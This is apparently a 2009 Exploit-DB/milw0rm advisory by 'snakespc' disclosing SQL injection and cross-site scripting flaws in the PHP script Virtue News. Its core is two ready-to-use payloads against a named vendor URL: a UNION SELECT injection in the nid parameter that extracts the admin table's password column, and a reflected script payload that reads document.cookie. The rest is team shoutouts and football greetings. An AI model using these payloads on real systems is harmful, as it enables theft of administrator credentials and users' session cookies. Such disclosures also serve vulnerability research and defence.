virtue news - SQL Injection / Cross-Site Scripting

EDB-ID:

8901


Author:

snakespc

Type:

webapps


Platform:

PHP

Date:

2009-06-08


Viva l'Algérie 3-1  --->Karim Matmour-->Abdel-Kader Ghazal-->Rafik al-Zuhair Jabbur-->
Félicitations à tous les Algériens
L'Algérie bat l'Egypte 3-1 à aller
El akouba pour le retour
#-------------------------AllaH AkbaR-------------------------------
#Virtue News Multiple Remote Vulnerabilities
#-------------------------------------------------------------------
#Discovered By: Snakespc     ALGERIAN HaCkEr 
#Mail: snakespc@gmail.com
#Site:http://www.snakespc.com/sc/index.php
#
#            les Algériens Kamikaz Wa4rin Fi kol Bla4s 
#-------------------------SNAKES TEAM-------------------------------
#Script:Virtue News
#
#
#http://www.virtuenetz.com/news_manager.php
#--------------------------SNAKES TEAM------------------------------
#Exploit:
#--------
#Demo:sql
#http://www.virtuenetz.com/news/news_detail.php?nid=-2+UNION%20SELECT%201,2,3,password,5,6,7+from+admin--
#Xss
#http://www.virtuenetz.com/news/news_detail.php?nid="><script>alert(document.cookie)</script>
#-------------------------SNAKES TEAM-------------------------------
# Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4 --->Tous les Algériens
#--------------------------SNAKES TEAM------------------------------
#ALL www.SnakespC.com/sc>>>> (  Members )  >>>>Str0ke >>>>>>>Milw0rm

# milw0rm.com [2009-06-08]